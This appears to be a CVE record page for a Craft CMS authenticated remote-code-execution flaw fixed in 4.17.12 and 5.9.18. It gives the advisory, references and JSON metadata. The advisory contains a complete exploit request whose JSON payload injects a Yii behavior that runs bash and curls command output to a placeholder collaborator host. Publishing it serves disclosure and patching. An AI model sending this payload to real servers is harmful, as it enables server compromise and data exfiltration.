← Back
2026-05-12 20:25CVE-2026-44011GitHub_M
PUBLISHED5.2CWE-479

Craft CMS: Potential authenticated Remote Code Execution via malicious attached Behavior

Craft CMS is a content management system (CMS). From 4.0.0 to before 4.17.12 and 5.9.18, Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event. This vulnerability is fixed in 4.17.12 and 5.9.18.

Problem type

Affected products

craftcms

cms

>= 4.0.0, < 4.17.12 - AFFECTED

>= 5.0.0, < 5.9.18 - AFFECTED

References

https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw

https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw

x_refsource_CONFIRM
https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3

https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3

x_refsource_MISC

GitHub Security Advisories

GHSA-qrgm-p9w5-rrfw

Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior

https://github.com/advisories/GHSA-qrgm-p9w5-rrfw

We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.

This is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.

The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.

This appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.

We were able to reproduce the attack by issuing a POST request to /admin/actions/element-search/search with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same beforeAction() path. This results in a curl request to the chosen server with the result of the command “id” for the web user being appended to the path:

POST /admin/actions/element-search/search HTTP/2
Host: hostnamehere
Cookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;
Content-Length: …
User-Agent: Mozilla/5.0
X-Csrf-Token: ...
Accept: application/json
Content-Type: application/json

{

 "elementType": "craft\\elements\\Category",
 "siteId": 1,
 "search": "",
 "condition": {
   "class": "craft\\elements\\conditions\\ElementCondition",
   "elementType": "craft\\elements\\Category",
   "fieldLayouts": [
     {
       "as rce": {
         "__class": "yii\\behaviors\\AttributeTypecastBehavior",
         "__construct()": [
           {
             "attributeTypes": {
               "typecastBeforeSave": [
                 "Psy\\Readline\\Hoa\\ConsoleProcessus",
                 "execute"
               ]
             },
             "typecastBeforeSave": "/bin/bash -c \"curl [https://yourcollaboratorservergoeshere/`id`\](https://yourcollaboratorservergoeshere/%60id%60/)""
           }
         ]
       },
       "on *": "self::beforeSave"
     }
   ]
 }
}

Resources

https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3

github.com

https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5

github.com

https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw

nvd.nist.gov

https://nvd.nist.gov/vuln/detail/CVE-2026-44011

github.com

https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3

github.com

https://github.com/advisories/GHSA-qrgm-p9w5-rrfw

JSON source

https://cveawg.mitre.org/api/cve/CVE-2026-44011
Click to expand
{
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "cveMetadata": {
    "cveId": "CVE-2026-44011",
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "dateUpdated": "2026-05-12T20:25:08.183Z",
    "dateReserved": "2026-05-04T21:24:36.505Z",
    "datePublished": "2026-05-12T20:25:08.183Z",
    "state": "PUBLISHED"
  },
  "containers": {
    "cna": {
      "providerMetadata": {
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M",
        "dateUpdated": "2026-05-12T20:25:08.183Z"
      },
      "title": "Craft CMS: Potential authenticated Remote Code Execution via malicious attached Behavior",
      "descriptions": [
        {
          "lang": "en",
          "value": "Craft CMS is a content management system (CMS). From 4.0.0 to before 4.17.12 and 5.9.18, Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event. This vulnerability is fixed in 4.17.12 and 5.9.18."
        }
      ],
      "affected": [
        {
          "vendor": "craftcms",
          "product": "cms",
          "versions": [
            {
              "version": ">= 4.0.0, < 4.17.12",
              "status": "affected"
            },
            {
              "version": ">= 5.0.0, < 5.9.18",
              "status": "affected"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "lang": "en",
              "description": "CWE-479: Signal Handler Use of a Non-reentrant Function",
              "cweId": "CWE-479",
              "type": "CWE"
            }
          ]
        }
      ],
      "references": [
        {
          "url": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw",
          "name": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw",
          "tags": [
            "x_refsource_CONFIRM"
          ]
        },
        {
          "url": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3",
          "name": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3",
          "tags": [
            "x_refsource_MISC"
          ]
        }
      ],
      "metrics": [
        {}
      ]
    }
  }
}